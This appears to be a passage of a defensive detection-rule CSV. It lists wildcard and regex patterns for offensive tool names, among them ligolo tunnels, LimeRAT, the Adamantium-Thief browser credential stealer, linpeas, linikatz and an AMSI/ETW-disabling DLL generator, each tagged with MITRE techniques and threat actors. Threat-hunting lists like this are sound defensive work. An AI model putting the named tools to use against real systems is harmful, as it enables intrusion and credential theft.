"*libnspr_nspr_log_file_priv_esc.*",".{0,1000}libnspr_nspr_log_file_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51001"
"*libreoffice2john.py*",".{0,1000}libreoffice2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51002"
"*libs/bofalloc*",".{0,1000}libs\/bofalloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","51003"
"*libs/bofentry*",".{0,1000}libs\/bofentry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","51004"
"*libs/bofhelper*",".{0,1000}libs\/bofhelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","0","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","51005"
"*LibSnaffle.ActiveDirectory*",".{0,1000}LibSnaffle\.ActiveDirectory.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#content","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","51006"
"*LibSnaffle.ActiveDirectory*",".{0,1000}LibSnaffle\.ActiveDirectory.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","51007"
"*LibSnaffle.FileDiscovery*",".{0,1000}LibSnaffle\.FileDiscovery.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","51008"
"*LibSnaffle.Logging*",".{0,1000}LibSnaffle\.Logging.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","51009"
"*libSSH-Authentication-Bypass*",".{0,1000}libSSH\-Authentication\-Bypass.{0,1000}","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tool","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z","51010"
"*libxpc_mitm_ssudo.*",".{0,1000}libxpc_mitm_ssudo\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51015"
"*libxselinux.old*",".{0,1000}libxselinux\.old.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51016"
"*libxselinux.so*",".{0,1000}libxselinux\.so.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51017"
"*lightsout.py*",".{0,1000}lightsout\.py.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","51019"
"*LightsOut-master.zip*",".{0,1000}LightsOut\-master\.zip.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","51020"
"*ligolo.lan*",".{0,1000}ligolo\.lan.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51021"
"*ligolo_darwin*",".{0,1000}ligolo_darwin.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51022"
"*ligolo_linux*",".{0,1000}ligolo_linux.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51023"
"*ligolo_windows*.exe*",".{0,1000}ligolo_windows.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51024"
"*ligolo-master*",".{0,1000}ligolo\-master.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51025"
"*ligolo-ng -selfcert*",".{0,1000}ligolo\-ng\s\-selfcert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51026"
"*ligolo-ng_agent*",".{0,1000}ligolo\-ng_agent.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51027"
"*ligolo-ng_proxy*",".{0,1000}ligolo\-ng_proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51028"
"*ligolo-ng-master*",".{0,1000}ligolo\-ng\-master.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51029"
"*Lime-Crypter.exe*",".{0,1000}Lime\-Crypter\.exe.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","51030"
"*LimeRAT v*/*",".{0,1000}LimeRAT\sv.{0,1000}\/.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","51031"
"*Lime-RAT-87e189781c0aef0e84cabe2f8c2e7d8f5143e594.zip*",".{0,1000}Lime\-RAT\-87e189781c0aef0e84cabe2f8c2e7d8f5143e594\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","51032"
"*LimerBoy/Adamantium-Thief*",".{0,1000}LimerBoy\/Adamantium\-Thief.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","51033"
"*LINDA.HARTLEY@TUTANOTA.COM*",".{0,1000}LINDA\.HARTLEY\@TUTANOTA\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51034"
"*LinEnum.sh*",".{0,1000}LinEnum\.sh.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","51035"
"*LinEnum-master.ip*",".{0,1000}LinEnum\-master\.ip.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","51036"
"*linikatz.sh*",".{0,1000}linikatz\.sh.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","51037"
"*linikatz.zip*",".{0,1000}linikatz\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","51038"
"*linikatzV2.sh*",".{0,1000}linikatzV2\.sh.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","51039"
"*link_tcp 127.0.0.1 *",".{0,1000}link_tcp\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","51040"
"*linkedin2username.py -u*",".{0,1000}linkedin2username\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51041"
"*link-inject*inject link into process*",".{0,1000}link\-inject.{0,1000}inject\slink\sinto\sprocess.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","51042"
"*linpeas_builder.py*",".{0,1000}linpeas_builder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51043"
"*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51044"
"*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51045"
"*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51046"
"*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51047"
"*linpeas_fat.sh*",".{0,1000}linpeas_fat\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51048"
"*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51049"
"*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51050"
"*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51051"
